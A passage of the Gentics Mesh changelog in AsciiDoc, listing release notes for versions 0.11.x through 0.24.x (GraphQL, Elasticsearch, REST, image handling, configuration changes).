3.5.4\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.37\n\nicon:plus[] GraphQL: Added filters for users, groups and roles.\n\nicon:check[] GraphQL: GraphQL Java has been updated to version 10.0\n\nicon:check[] Core: Loading of older jobs could cause an error. The causes of those errors have been fixed.\n\nicon:check[] Migration: Fix migration regression which was introduced with 0.24.1\n\nicon:check[] Demo: Fix demo webroot path handling. This fix only affects new demo setups.\n\n[[v0.24.1]]\n== 0.24.1 (02.10.2018)\n\nicon:plus[] Config: It is now possible to configure the path to the mesh lock file using the `MESH_LOCK_PATH` environment variable. link:https:\/\/github.com\/gentics\/mesh\/issues\/506[#506]\n\nicon:plus[] It is now possible to add custom languages by configuration.\n\nicon:check[] UI: Added a scrollbar to the schema dropdown menu. link:https:\/\/github.com\/gentics\/mesh-ui\/pull\/163[#163]\n\nicon:check[] Core: A inconsistency within the webroot path handling has been fixed. Previously the webroot path uniqueness checks would not work correctly once another branch has been added.\n\nicon:check[] REST: The response error code handling for uploads has been updated. Previously no error 413 was returned when the upload limit was reached.\n\nicon:check[] Elasticsearch: The initial sync check will be omitted if no elasticsearch has been configured.\n\nicon:check[] Java REST Client: fixed a bug that could lead to duplicate request headers.\n\n[[v0.24.0]]\n== 0.24.0 (25.07.2018)\n\nCAUTION: The default value of `25` for the `perPage` parameter has been removed. By default all elements will be returned and no paging will be applied.\n\nicon:check[] Core: A regression within the webroot performance enhancement fix of `0.23.0` has been fixed.\n\n[[v0.23.0]]\n== 0.23.0 (24.07.2018)\n\nCAUTION: The breadcrumb of the REST node response and the breadcrumb of the node type in GraphQL has changed. The first element is now the root node of the project followed by its descendants including the currently queried node. Previously the order was reversed. Additionally the root node and the current were missing. link:https:\/\/github.com\/gentics\/mesh\/issues\/398[#398]\n\nCAUTION: The concept of releases has been renamed into branches. The database structure will automatically be updated.\n\n* The following query parameters have been changed: `release` -> `branch`, `updateAssignedReleases` -> `updateAssignedBranches`, `updateReleaseNames` -> `updateBranchNames`\n* The `releases` endpoint was renamed to `branches`.\n* The `mesh.release.created`, `mesh.release.updated`, `mesh.release.deleted` events have been changed to `mesh.branch.created`, `mesh.branch.updated`, `mesh.branch.deleted`.\n* The Java REST Models have been renamed. (e.g.: ReleaseCreateRequest -> BranchCreateRequest)\n* I18n messages have been changed accordingly.\n* The GraphQL field `release` has been renamed to `branch`. The type name was also updated.\n\nicon:plus[] Elasticsearch: The base64 encoded binary document data will no longer be stored in the search index.\n\nicon:plus[] Elasticsearch: The `\/search\/status` endpoint now has a new field `available`, which shows if Elasticsearch is currently ready to process search queries.\n\nicon:plus[] Elasticsearch: An error was fixed which was thrown when Elasticsearch was disabled and a re-sync was scheduled.\n\nicon:plus[] REST: Added `?etag=false` query parameter which can be used to omit the etag value generation in order to increase performance when etags are not needed.\n\nicon:plus[] REST: Added `?fields=uuid,username` query parameter which can be used to filter the response to only include the listed fields within a response. The filters work for most responses and can be used to increase write performance for REST.\n\nicon:plus[] GraphQL: It is now possible to filter schemas by their container flag.\n\nicon:check[] GraphQL: Fixed a bug that caused an error when multiple queries where executed concurrently.\n\nicon:check[] Core: Increased performance for webroot endpoint.\n\nicon:plus[] REST: Re-enabled SSL options. It is now possible to configure SSL via `MESH_HTTP_SSL_KEY_PATH`, `MESH_HTTP_SSL_CERT_PATH`, `MESH_HTTP_SSL_ENABLE` environment options.\n\n[[v0.22.11]]\n== 0.22.11 (05.03.2019)\n\nicon:plus[] GraphQL: The underlying graphql-java library was updated to version 10.0.\n\nicon:plus[] GraphQL: nodes can now be loaded via a list of UUIDs.\n\n[[v0.22.10]]\n== 0.22.10 (18.01.2019)\n\nicon:check[] Elasticsearch: Fixed a bug that caused a schema migration to never be finished. This affected nodes with binaries that are readable by the Elasticsearch Ingest Attachment Processor Plugin.\n\nicon:check[] Image: Resizing images will now use the balanced quality setting. This helps with images that suffered from visible aliasing.\n\n[[v0.22.9]]\n== 0.22.9 (15.01.2019)\n\nicon:plus[] Consistency Checks: Additional consistency checks and repair actions have been added.\n\nicon:plus[] Memory: The memory footprint of various operations has been reduced.\n\nicon:plus[] Consistency Checks: The consistency endpoint response will now also list a `repairCount` property which lists the count of repair operations.\n The response will now only contain the first 200 results. The `outputTruncated` property indicates whether the result has been truncated.\n\nicon:check[] Core: Node deletion will now also remove connected lists and micronodes. Previously these elements were not properly removed. On large systems this could lead to increased disk usage.\n\n[[v0.22.8]]\n== 0.22.8 (30.11.2018)\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.37\n\n[[v0.22.7]]\n== 0.22.7 (12.11.2018)\n\nicon:check[] Elasticsearch: The check for the `ingest-attachment` plugin was fixed for installations which were using the `AWS` Elasticsearch service.\n\nicon:plus[] API: Make OAuth2 Server options overrideable via environment variables.\n\n[[v0.22.6]]\n== 0.22.6 (30.10.2018)\n\nicon:check[] Java REST Client: Fixed wrong log output information.\n\nicon:check[] REST: Fixed error while fetching jobs for deleted projects.\n\nicon:plus[] Elasticsearch: The index sync will now automatically remove no longer used indices.\n\n\n[[v0.22.5]]\n== 0.22.5 (12.10.2018)\n\nicon:plus[] A default paging value can now be configured via the `defaultPageSize` field in the `mesh.yml` file, or the `MESH_DEFAULT_PAGE_SIZE` environment variable.\n\nicon:check[] Java REST Client: Add more detailed error information to `MeshRestClientMessageException` class.\n\n[[v0.22.4]]\n== 0.22.4 (08.10.2018)\n\nicon:check[] REST: The response error code handling for uploads has been updated. Previously no error 413 was returned when the upload limit was reached.\n\nicon:check[] Elasticsearch: The initial sync check will be omitted if no elasticsearch has been configured.\n\nicon:plus[] Plugins: It is now possible to override plugin config in a `config.local.yml` file.\n\n[[v0.22.3]]\n== 0.22.3 (20.09.2018)\n\nicon:plus[] It is now possible to add custom languages by configuration.\n\n[[v0.22.2]]\n== 0.22.2 (13.09.2018)\n\nicon:check[] Java REST Client: fixed a bug that could lead to duplicate request headers\n\n[[v0.22.1]]\n== 0.22.1 (14.08.2018)\n\nicon:plus[] Migration: The micronode and release migration performance has been greatly enhanced.\n\n[[v0.22.0]]\n== 0.22.0 (19.07.2018)\n\nicon:bullhorn[] Metadata extraction\n\n[quote]\n____\nThis version of Gentics Mesh introduces the __Metadata extraction__ of file uploads (PDF, Images).\nGPS information of images will now be added to the search index. That information can be used to run link:{{< relref \"elasticsearch.asciidoc\" >}}#_search_nodes_by_geolocation_of_images[geo search queries].\nA detailed description of this feature can be found in our {{< relref \"features.asciidoc\" >}}#_metadata_handling[File Uploads Documentation].\n\nExisting binary fields will not be automatically be processed to provide the metadata. You need to manually re-upload the data in order to generate the metadata properties.\n____\n\nicon:check[] Image: Focal point information within binary fields will now be utilized when invoking a download request which contains `?crop=fp&height=200&width=100`. Previously the stored information was not used and no focal point cropping was executed. link:https:\/\/github.com\/gentics\/mesh\/issues\/417[#417]\n\nicon:check[] Schema: A minor issue within the schema diff mechanism has been fixed. Previously the `elasticsearch` property was not correctly handled if an empty object has been provided during an update.\n\n[[v0.21.5]]\n== 0.21.5 (14.07.2018)\n\nicon:check[] REST: The order of elements within a micronode list field will now be correctly preserved. Previously the order would change once the list reached a size of about 20 elements. link:https:\/\/github.com\/gentics\/mesh\/issues\/469[#469]\n\nicon:check[] Memory: The memory footprint for deletion, publish and unpublish operations has been greatly reduced.\n\nicon:check[] Config: Fixed handling of `MESH_VERTX_WORKER_POOL_SIZE` and `MESH_VERTX_EVENT_POOL_SIZE` environment variables. These variables were previously ignored.\n\nicon:check[] REST: The node update response will now contain the updated node in the correct language. Any provided language parameter will be ignored.\n\nicon:plus[] REST: The amount of fields which will be returned can now be tuned using the `?fields` query parameter. The parameter can be used to improve the write performance by only including the `uuid` parameter in the response.\n\nicon:plus[] Core: The core Vert.x library was updated to version 3.5.3\n\n[[v0.21.4]]\n== 0.21.4 (09.07.2018)\n\nicon:plus[] Migration: Segment path conflicts will now automatically be resolved during the node migration. Information about actions taken can be found within the response of the job migration.\n\nicon:plus[] Migration: The node migration performance has been greatly enhanced. link:https:\/\/github.com\/gentics\/mesh\/issues\/453[#453]\n\nicon:check[] Elasticsearch: Start up of Gentics Mesh will now fail early if the embedded Elasticsearch server can't be started. link:https:\/\/github.com\/gentics\/mesh\/issues\/445[#445]\n\nicon:check[] Elasticsearch: The error logging has been enhanced. More detailed information will be logged if an index can't be created.\n\nicon:check[] UI: Fixed potential encoding issues in the UI on systems which are not using the UTF-8 default character set.\n\nicon:check[] Core: Fixed a bug that caused an unwanted schema migration when a schema update without any changes was invoked. This was the case with the `elasticsearch` properties.\n\n[[v0.21.3]]\n== 0.21.3 (19.06.2018)\n\nicon:check[] GraphQL: Fixed a bug that caused an error when multiple queries where executed concurrently.\n\nicon:check[] GraphQL: The language fallback handling for node reference fields has been enhanced. The language of the node will now be utilized when no language fallback has been specified.\n\nicon:check[] GraphQL: The language fallback handling has been enhanced. The language fallback will now automatically be passed along to load nested fields.\n\nicon:check[] GraphQL: The link resolving of html and string fields has been updated. Previously the language of the node which contained the field was not taken into account while resolving mesh links in these fields.\n\n[[v0.21.2]]\n== 0.21.2 (13.06.2018)\n\nicon:check[] Elasticsearch: A compatibility issue with Elasticsearch instances which were hosted on Amazon AWS has been fixed. Previously the check for installed ES plugins failed.\n\n\n[[v0.21.1]]\n== 0.21.1 (28.05.2018)\n\nicon:plus[] Elasticsearch: It is now possible to configure https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/mapping.html[custom mappings] for binary fields. Currently only the `mimeType` and `file.content` fields can be mapped. An example for this mapping can be found in the link:{{< relref \"elasticsearch.asciidoc\" >}}#_binary_fields[Gentics Mesh search documentation].\n\n[[v0.21.0]]\n== 0.21.0 (27.05.2018)\n\nicon:bullhorn[] Binary Search\n\n[quote]\n____\nThis version of Gentics Mesh introduces the __Binary Search support__.\n\nThe https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/plugins\/6.2\/ingest-attachment.html[Elasticsearch Ingest Attachment Plugin] will be utilized if possible to process text file uploads (PDF, DOC, DOCX).\nA detailed description of this feature can be found in our link:{{< relref \"elasticsearch.asciidoc\" >}}#_binarysearch[Elasticsearch Documentation].\n____\n\nicon:plus[] Elasticsearch: It is now possible to configure a prefix string within the search options. Multiple Gentics Mesh installations with different prefixes can now utilize the same Elasticsearch server. Created indices and pipelines will automatically be prefixed. Other elements which do not start with the prefix will be ignored.\n\n[[v0.20.0]]\n== 0.20.0 (25.05.2018)\n\nicon:bullhorn[] OAuth2 Support\n\n[quote]\n____\nThis version of Gentics Mesh introduces the __OAuth2 authentication support__. A detailed description of this feature can be found in our link:{{< relref \"authentication.asciidoc\" >}}#_oauth2[Authentication Documentation].\n____\n\nicon:plus[] Plugins: All plugin endpoints will now automatically be secured via the configured authentication mechanism.\n\nicon:check[] Plugins: The admin client token will no longer expire. The token was previously only valid for one hour.\n\nicon:check[] Plugins: When deployment of a plugin fails during plugin initialization, the plugin can now be redeployed without restarting Gentics Mesh.\n\nicon:check[] Plugins: Fixed a bug which prevented the user client from using the correct token was fixed. The user client will now utilize the correct user token.\n\n[[v0.19.2]]\n== 0.19.2 (02.05.2018)\n\nicon:check[] Docker: The base image of the Gentics Mesh docker container has been reverted back to `java:openjdk-8-jre-alpine`. We will switch to Java 10 with the upcoming OrientDB 3.0.0 update.\n\nicon:check[] UI: In some cases the UI did not load fast. We updated the caching mechanism to quickly load the UI after a new Gentics Mesh version has been deployed.\n\n[[v0.19.1]]\n== 0.19.1 (30.04.2018)\n\nicon:plus[] REST: The `{apiLatest}\/admin\/consistency\/repair` endpoint has been added. The endpoint can be used to verify and directly repair found inconsistencies.\n The `{apiLatest}\/admin\/consistency\/check` endpoint response has been updated to also include information about the action which will be performed by `\/repair` in order to repair the inconsistency.\n You can read more about these endpoints in the link:{{< relref \"administration-guide.asciidoc\" >}}#_database_consistency[database consistency] section in our administration documentation.\n\n[[v0.19.0]]\n== 0.19.0 (28.04.2018)\n\nicon:bullhorn[] Plugin System\n\n[quote]\n____\nThis version of Gentics Mesh introduces the _Plugin System_. A detailed description of this feature can be found in our link:{{< relref \"plugin-system.asciidoc\" >}}[Plugin System Documentation].\n____\n\nicon:plus[] The base image of the Gentics Mesh docker container has been changed to `openjdk:10-slim`.\n\nicon:plus[] Logging: The logging verbosity has been further decreased.\n\n[[v0.18.3]]\n== 0.18.3 (25.04.2018)\n\nicon:check[] REST: Add error response when updating a user node reference without specifying the project name.\n\nicon:check[] REST: Fixed the root cause of an inconsistency which caused the deletion of referenced nodes when deleting a node.\n\n[[v0.18.2]]\n== 0.18.2 (23.04.2018)\n\nCAUTION: Database revision was updated due to OrientDB update. Thus only an link:{{< relref \"clustering.asciidoc\" >}}#_offline_upgrade[offline upgrade] can be performed when using clustered mode.\n\nCAUTION: The generation of the search index document version has been reworked in order to increase index sync performance.\n A triggered index sync will thus re-sync all documents. Triggering the sync action is not required and can be executed at any time.\n\nicon:plus[] Backup\/Restore: It is now no longer required to restart the server after a backup has been restored via the `{apiLatest}\/admin\/graphdb\/restore` endpoint. link:https:\/\/github.com\/gentics\/mesh\/issues\/387[#387]\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.34\n\nicon:plus[] Consistency: Additional consistency checks have been added.\n\nicon:check[] Consistency: Various consistency issues have been fixed.\n\nicon:check[] REST: Fixed various security related issues.\n\nicon:check[] Core: Image data in binary fields will now only be processed\/transformed if the binary is in a readable file format. The readable image file formats are `png`, `jpg`, `bmp` and `gif`.\n\nicon:check[] Core: Added consistency checks for node versions.\n\nicon:check[] Core: Deleting language versions of nodes will no longer create inconsistencies.\n\nicon:check[] Core: Projects containing multiple releases can now be deleted without any error.\n\n[[v0.18.1]]\n== 0.18.1 (13.04.2018)\n\nicon:check[] Core: Added consistency check for node containers.\n\nicon:check[] GraphQL: Using filtering with nodes without content does not throw an error anymore.\n\nicon:check[] REST: Added missing `hostname` and `ssl` property handling for release creation requests.\n\nicon:check[] REST: Creating a release with fixed UUID will now invoke the node migration.\n\nicon:check[] Java REST Client: The `eventbus()` method now correctly sends authorization headers.\n\nicon:check[] Java Rest Client: Missing methods to start schema\/microschema migrations for a release have been added.\n\n[[v0.18.0]]\n== 0.18.0 (06.04.2018)\n\nicon:bullhorn[] GraphQL filtering\n\n[quote]\n____\nThis version of Gentics Mesh introduces _GraphQL filtering_. A detailed description of this feature can be found in our link:{{< relref \"graphql.asciidoc\" >}}#_filtering[Documentation].\n____\n\n---\n\nCAUTION: Search: The `{apiLatest}\/search\/reindex` endpoint was replaced by `{apiLatest}\/search\/sync`.\n\nicon:plus[] Docs: The link:{{< relref \"contributing.asciidoc\" >}}[Contribution Guide] has been added.\n\nicon:plus[] The `{apiLatest}\/search\/sync` endpoint can now be used to trigger the differential synchronization of search indices.\n The indices will no longer be dropped and re-populated. Instead only needed actions will be executed to sync the index with the Gentics Mesh data.\n\nicon:plus[] The `{apiLatest}\/search\/clear` endpoint has been added. It can be used to re-create all Elasticsearch indices which are managed by Gentics Mesh.\n Note that this operation does not invoke the index sync.\n\nicon:plus[] Docker: A new volume location for the data directory of the embedded elasticsearch has been added.\n You can now use the `\/elasticsearch\/data` folder to mount your elasticsearch data files. link:https:\/\/github.com\/gentics\/mesh\/issues\/348[#348]\n\nicon:plus[] REST: The `{apiLatest}\/search\/status` endpoint has been enhanced. The endpoint will now also return the current elasticsearch sync progress.\n\nicon:plus[] Logging: The logging verbosity has been further decreased.\n\nicon:check[] REST: Fix ETag generation for nodes.\n Previously taking a node offline did not alter the ETag and this also lead to inconsistent status\n information being displayed in the Mesh UI link:https:\/\/github.com\/gentics\/mesh\/issues\/345[#345]\n\nicon:check[] Java Rest Client: Fix webroot requests never returns when containing whitespaces.\n\nicon:check[] GraphQL: Fixed language parameter in nodes query method was ignored in some cases. link:https:\/\/github.com\/gentics\/mesh\/issues\/365[#365]\n\nicon:check[] REST: The `{apiLatest}\/microschemas` endpoint will now correctly detect name conflicts during microschema creation.\n\n[[v0.17.3]]\n== 0.17.3 (15.03.2018)\n\nicon:check[] UI: Restrict nodes to certain schema if allow is set in node list fields.\n\n[[v0.17.2]]\n== 0.17.2 (13.03.2018)\n\nicon:plus[] Docker: A new volume location for the `config` directory has been added.\n You can now use the `\/config` folder to mount your configuration files.\n\nicon:plus[] Core: The Vert.x library has been downgraded to 3.5.0 due to a regression which could cause requests to not be handled by the HTTP Server.\n\n[[v0.17.1]]\n== 0.17.1 (08.03.2018)\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.33\n\nicon:plus[] Core: The core Vert.x library was updated to version 3.5.1\n\nicon:plus[] Config: It is now possible to configure the elasticsearch start-up timeout via the `search.startupTimeout` field in the `mesh.yml` or via the `MESH_ELASTICSEARCH_STARTUP_TIMEOUT` environment variable.\n\nicon:plus[] Search: The reindex endpoint will now execute the reindex operation asynchronously.\n\nicon:plus[] Search: Two new reindex specific events have been added: `mesh.search.reindex.failed`, `mesh.search.reindex.completed`.\n\nicon:plus[] REST: The `GET {apiLatest}\/search\/status` endpoint response has been updated. The `reindexRunning` flag has been added.\n\nicon:check[] Config: Fixed a bug which prevented optional boolean environment variables (e.g. `MESH_HTTP_CORS_ENABLE_ENV`) from being handled correctly.\n\nicon:check[] Core: It is now possible to change the listType of a list field in a schema via the Rest-API.\n\nicon:check[] Core: The server will now shutdown if an error has been detected during start-up.\n\nicon:check[] REST: Fixed an error which led to inconsistent properties being shown in the job endpoint response.\n\nicon:check[] Search: When calling reindex via the `POST {apiLatest}\/search\/reindex` endpoint the reindexing stopped after a certain amount of\n time because of a timeout in the database transaction. This has been fixed now.\n\nicon:check[] REST: In some cases parallel file uploads of multiple images could cause the upload process to never finish. This has been fixed now.\n\n[[v0.17.0]]\n== 0.17.0 (22.02.2018)\n\nCAUTION: Search: The raw search endpoints now wraps a multisearch request. The endpoint response will now include the elasticsearch responses array. The query stays the same.\n\nicon:plus[] Demo: The link:https:\/\/demo.getmesh.io\/demo[demo application] was updated to use Angular 5.\n\nicon:plus[] Core: Gentics Mesh can now be downgraded if the link:{{< relref \"administration-guide.asciidoc\" >}}#database-revisions[database revision] matches the needed revision of Gentics Mesh.\n\nicon:plus[] Clustering: Gentics Mesh is now able to form cluster between different server versions.\n\t\t\tA database revision hash will now be used to determine which versions of Gentics Mesh can form a cluster.\n\t\t\tOnly instances with the same database revision hash are allowed to form a cluster.\n\t\t\tThe current revision hash info is included in the `{apiLatest}` endpoint response.\n\nicon:plus[] Various settings can now be overridden via link:{{< relref \"administration-guide.asciidoc\" >}}#_environment_variables[environment variables]. This is useful when dealing with docker based deployments.\n\nicon:check[] Elasticsearch: Search requests failed on systems with many schemas. link:https:\/\/github.com\/gentics\/mesh\/issues\/303[#303]\n\nicon:check[] Elasticsearch: Fixed handling of `search.url` settings which contained a https URL.\n\nicon:check[] Image: The image resizer returned the original image if no `fpx`,`fpy` were present for a focal point image resize request. link:https:\/\/github.com\/gentics\/mesh\/issues\/272[#272]\n\nicon:check[] Image: The focal point resize returned a slightly skewed image when using the `fpz` zoom factor. link:https:\/\/github.com\/gentics\/mesh\/issues\/272[#272]\n\nicon:check[] Events: The `mesh.node.deleted` event was not handled correctly. This has been fixed now.\n\nicon:check[] Core: It was possible to upload binaries with empty filenames. This has been fixed now: it is enforced that\n\t\t\t\t a binary upload has a filename and content type which are not empty. link:https:\/\/github.com\/gentics\/mesh\/issues\/299[#299]\n\nicon:check[] Core: If the keystore path was only a file name without a directory a NPE was thrown on start-up. This has been fixed now.\n\nicon:check[] Core: After resetting a job via rest (admin\/jobs\/::uuid::\/error) the job was not processed again.\n This has been fixed now. link:https:\/\/github.com\/gentics\/mesh\/issues\/295[#295]\n\nicon:check[] Core: When the migration for multiple nodes failed during a schema migration the error details could become very long.\n\t\t\t\t\tThis has been fixed now. Error details in the job list will be truncated after a certain amount of characters.\n\nicon:check[] Core: Image transformation calls previously did not copy the image properties of the binary field.\n Instead the filename and other properties were not copied to the new binary image field. This has been fixed now.\n\nicon:plus[] REST: It is now possible use custom `HttpClientOptions` upon instantiation of a `MeshRestHttpClient`.\n\nicon:check[] REST: The node response ETag now incorporates the uuids of all node references.\n\nicon:check[] REST: The `{apiLatest}\/auth\/logout` endpoint will now correctly delete the `mesh.token` cookie. link:https:\/\/github.com\/gentics\/mesh\/issues\/282[#282]\n\n[[v0.16.0]]\n== 0.16.0 (07.02.2018)\n\nCAUTION: Search: The contents of HTML and HTML list fields will now automatically be stripped of markup prior of indexing.\n\nCAUTION: The `mesh.yml` search section has been updated. The `search.url` property replaces the `search.hosts` property.\n\n[source,json]\n----\nsearch:\n url: \"http:\/\/localhost:9200\"\n timeout: 8000\n startEmbedded: false\n----\n\nicon:plus[] GraphQL: The underlying graphql-java library was updated to version 7.0.\n\nicon:check[] REST: An error which prevented the `{apiLatest}` info endpoint from returning version information has been fixed.\n\nicon:plus[] OrientDB: The included OrientDB Studio has been updated to version 2.2.32.\n\nicon:plus[] Config: It is now possible to configure the JVM arguments of the embedded Elasticsearch server via the `search.embeddedArguments` property in the `mesh.yml` file.\n\nicon:plus[] GraphQL: Schema fields can now be queried. Currently supported are `name`, `label`, `required` and `type`.\n\n[[v0.15.0]]\n== 0.15.0 (31.01.2018)\n\nCAUTION: The embedded Elasticsearch was removed and replaced by a connector to a dedicated Elasticsearch server. It is highly recommended to verify existing queries due to breaking changes between Elasticsearch version 2.4 and 6.1.\nPlease also check the Elasticsearch changelog: link:https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/release-notes-6.1.0.html[Elasticsearch Changelog]\n\nCAUTION: Configuration: The `mesh.yml` format has been updated. Please remove the `search` section or replace it with the following settings.\n\n[source,json]\n----\nsearch:\n hosts:\n - hostname: \"localhost\"\n port: 9200\n protocol: \"http\"\n startEmbeddedES: true\n----\n\nCAUTION: The Elasticsearch update may affect custom mappings within your schemas. You may need to manually update your schemas.\n\nElasticsearch 6.1 compliant example for the commonly used raw field:\n\n[source,json]\n----\n{\n \"fields\": {\n \"raw\": {\n \"type\": \"keyword\",\n \"index\": true\n }\n }\n}\n----\n\nCAUTION: The `unfilteredCount` GraphQL paging property has been removed. You can now use the `totalCount` property instead.\n\nCAUTION: Gentics Mesh will automatically extract and start an embedded Elasticsearch server into the `elasticsearch` folder. The old search index (e.g: `data\/searchIndex`) can be removed.\n\nCAUTION: The user which is used to run the process within the docker image has been changed. You may need to update your data volume ownership to uid\/gid 1000.\n\nicon:plus[] REST: The UUID of the referenced binary data will now also be listed for binary fields. Fields which share the same binary data will also share the same binary UUID.\n\nicon:plus[] GraphQL: It is now possible to read the focal point information and binary uuid of binary fields.\n\nicon:plus[] Docs: The link:{{< relref \"elasticsearch.asciidoc\" >}}[Elasticsearch integration documentation] has been enhanced.\n\nicon:plus[] Search: The overall search performance has been increased.\n\nicon:plus[] Logging: The logging verbosity has been further decreased.\n\n[[v0.14.2]]\n== 0.14.2 (30.01.2018)\n\nicon:check[] Elasticsearch: Fixed a bug which caused an internal error when granting multiple permissions to the same element at the same time.\n\nicon:check[] GraphQL: The `linkType` parameter for string and html fields now causes the the link to be rendered in the language of the queried node if no language information is given.\n\n[[v0.14.1]]\n== 0.14.1 (19.01.2018)\n\nicon:check[] Core: Fixed a deadlock situation which could occur when handling more than 20 image resize requests in parallel. Image resize operations will now utilize a dedicated thread pool.\n\nicon:check[] Core: Fixed a bug which caused permission inconsistencies when deleting a group from the system.\n\nicon:plus[] REST: Added support to automatically handle the `Expect: 100-Continue` header. We however recommend to only use this header for upload requests.\nUsing this header will otherwise reduce the response times of your requests. Note that PHP curl will add this header by default.\nYou can read more about the link:https:\/\/support.urbanairship.com\/hc\/en-us\/articles\/213492003--Expect-100-Continue-Issues-and-Risks[header here].\n\n[[v0.14.0]]\n== 0.14.0 (16.01.2018)\n\nCAUTION: The image manipulation query parameters `cropx`, `cropy`, `croph` and `cropw` have been replaced by the `rect` parameter. The `rect` parameter contains the needed values `rect=x,y,w,h`.\n\nCAUTION: The image manipulation query parameter `width` was renamed to `w`. The parameter `height` was renamed to `h`.\n\nCAUTION: The binary transformation request request was updated. The crop parameters are now nested within the `cropRect` object.\n\nCAUTION: It is now required to specify the crop mode when cropping an image. Possible crop modes are `rect` which will utilize the specified crop area or `fp` which will utilize the focal point information in order to crop the image.\n\nicon:plus[] Image: It is now possible to specify a focal point within the binary field of an image.\n This focal point can be used to automatically crop the image in a way so that the focused area is kept in the image.\n The focal point can also be manually specified when requesting an image.\n This will overrule any previously stored focal point information within the binary field.\n\nicon:plus[] UI: The admin UI has been updated to use the renamed image parameters.\n\n[[v0.13.3]]\n== 0.13.3 (12.01.2018)\n\nicon:check[] Core: Optimized concurrency when handling binary data streams (e.g: downloading, image resizing)\n\nicon:check[] Core: Fixed some bugs which left file handles open and thus clogged the system. This could lead a lock-up of the system in some cases.\n\n[[v0.13.2]]\n== 0.13.2 (11.01.2018)\n\nicon:plus[] Java Rest Client: It is now possible to retrieve the client version via `MeshRestClient.getPlainVersion()`.\n\nicon:check[] Core: The consistency checks have been enhanced.\n\nicon:check[] Core: Fixed some bugs which left file handles open and thus clogged the system. This could lead a lock-up of the system in some cases.\n\n[[v0.13.1]]\n== 0.13.1 (05.01.2018)\n\nicon:check[] Core: A Vert.x bug has been patched which caused HTTP requests to fail which had the \"Connection: close\" header set.\n\nicon:check[] REST: A concurrency issue has been addressed which only happens when deleting and creating projects in fast succession.\n\nicon:check[] Core: A potential concurrency issue has been fixed when handling request parameters.\n\n[[v0.13.0]]\n== 0.13.0 (02.01.2018)\n\nCAUTION: The Java REST client was updated to use RxJava 2.\n\nicon:plus[] Core: The internal RxJava code has been migrated to version 2.\n\n[[v0.12.0]]\n== 0.12.0 (21.12.2017)\n\nCAUTION: The `search.httpEnabled` option within the `mesh.yml` has been removed. The embedded elasticsearch API can no longer be directly accessed via HTTP. The existing endpoint `{apiLatest}\/:projectName\/search` is unaffected by this change.\n\nicon:plus[] Core: The core Vert.x library was updated to version 3.5.0\n\nicon:plus[] Core: The internal server routing system has been overhauled.\n\n== 0.11.8 (18.12.2017)\n\nicon:check[] Image: Fixed a bug which left file handles open and thus clogged the system. This could lead a lock-up of the system in some cases.\n\n== 0.11.7 (17.12.2017)\n\nicon:check[] UI: Fixed an issue where the name in the explorer content list in always shown in English. link:https:\/\/github.com\/gentics\/mesh\/issues\/23[#23]\n\nicon:check[] Storage: Binary field deletion has been made more resilient and will no longer fail if the referenced binary data is not stored within used binary storage. link:https:\/\/github.com\/gentics\/mesh\/issues\/235[#235]\n\nicon:plus[] REST: The `hostname` and `ssl` properties have been added to the project create request. This information will be directly added to the initial release of the project. The properties can thus be changed by updating the project.\n\nicon:plus[] REST: The link resolver mechanism was enhanced to also consider the `hostname` and `ssl` flag of the release of the node which is linked.\n The link resolver will make use of these properties as soon as mesh links point to nodes of foreign projects.\n You can read more on this topic in the link:{{< relref \"features.asciidoc\" >}}#crossdomainlinks[cross domain link section] of our documentation.\n\n== 0.11.6 (15.12.2017)\n\nicon:plus[] Search: The automatic recreation of the search index will now also occur if an empty search index folder was found.\n\nicon:check[] UI: Nodes are now always reloaded when the edit button is clicked in the explorer content list. link:https:\/\/github.com\/gentics\/mesh-ui\/issues\/16[#16]\n\nicon:check[] UI: Fixed an issue that was causing a click on a node in the explorer list to open it like a container, even if it is not a container.\n\nicon:check[] UI: Dropdowns for required string fields with the allowed attribute now properly require a value to be set in order to save the node.\n\nicon:check[] UI: Fixed a issue where contents of a micronode were not validated before saving a node.\n\nicon:check[] Core: Reduce the memory load of the ChangeNumberStringsToNumber-changelog by reducing the size of a single transactions.\n\nicon:check[] Image: Image handling has been optimized. Previously resizing larger images could temporarily lock up the http server.\n\n== 0.11.5 (14.12.2017)\n\nicon:plus[] UI: Add multi binary upload dialogue. Users can now upload multiple files at once by clicking the button next to the create node button.\n\nicon:plus[] UI: Binary fields can now be used as display fields. The filename is used as the display name for the node. link:https:\/\/github.com\/gentics\/mesh-ui\/issues\/11[#11]\n\nicon:plus[] UI: It is now possible to specify the URL to the front end of a system. This allows users to quickly go to the page that represents the node in the system.\n See the default `mesh-ui-config.js` or the link:{{< relref \"user-interface.asciidoc\" >}}#_configuration[online documentation] for more details. link:https:\/\/github.com\/gentics\/mesh-ui\/issues\/14[#14]\n\nicon:plus[] Upload: The upload handling code has been refactored in order to process the uploaded data in-parallel.\n\nicon:plus[] Storage: The binary storage mechanism has been overhauled in preparation for Amazon S3 \/ link:https:\/\/minio.io\/[Minio] support.\n The data within the local binary storage folder and all binary fields will automatically be migrated.\n The created `binaryFilesMigrationBackup` folder must be manually removed once the migration has finished.\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.31\n\nicon:plus[] Core: Binary fields can now be chosen as display fields. The value of the display field is the filename of the binary.\n\nicon:plus[] REST: The display name has been added to the node response. It can be found in the key `displayName`.\n\nicon:plus[] GraphQL: The display name can now be fetched from a node via the `displayName` field.\n\nicon:check[] UI: Nodes in the \"Select Node...\" dialogue are now sorted by their display name. link:https:\/\/github.com\/gentics\/mesh-ui\/issues\/15[#15]\n\nicon:check[] UI: The \"Select Node...\" dialogue now remembers the last position it was opened. link:https:\/\/github.com\/gentics\/mesh-ui\/issues\/12[#12]\n\nicon:check[] UI: The dropdown for list types in the schema editor now only shows valid list types.\n\nicon:check[] UI: Fixed a bug that causes image preview to disappear after saving a node. link:https:\/\/github.com\/gentics\/mesh-ui\/issues\/18[#18]\n\nicon:check[] Core: A bug has been fixed which prevented node updates. The issue occurred once a node was updated from which a language variant was previously deleted.\n\nicon:check[] Search: The search index will now automatically be recreated if the search index folder could not be found.\n\nicon:check[] Core: The values of number-fields where stored as strings in the database which caused issues when converting numbers to and from string.\n This has been fixed: the values of number-fields will now be stored as numbers.\n\nicon:check[] Schema: The schema 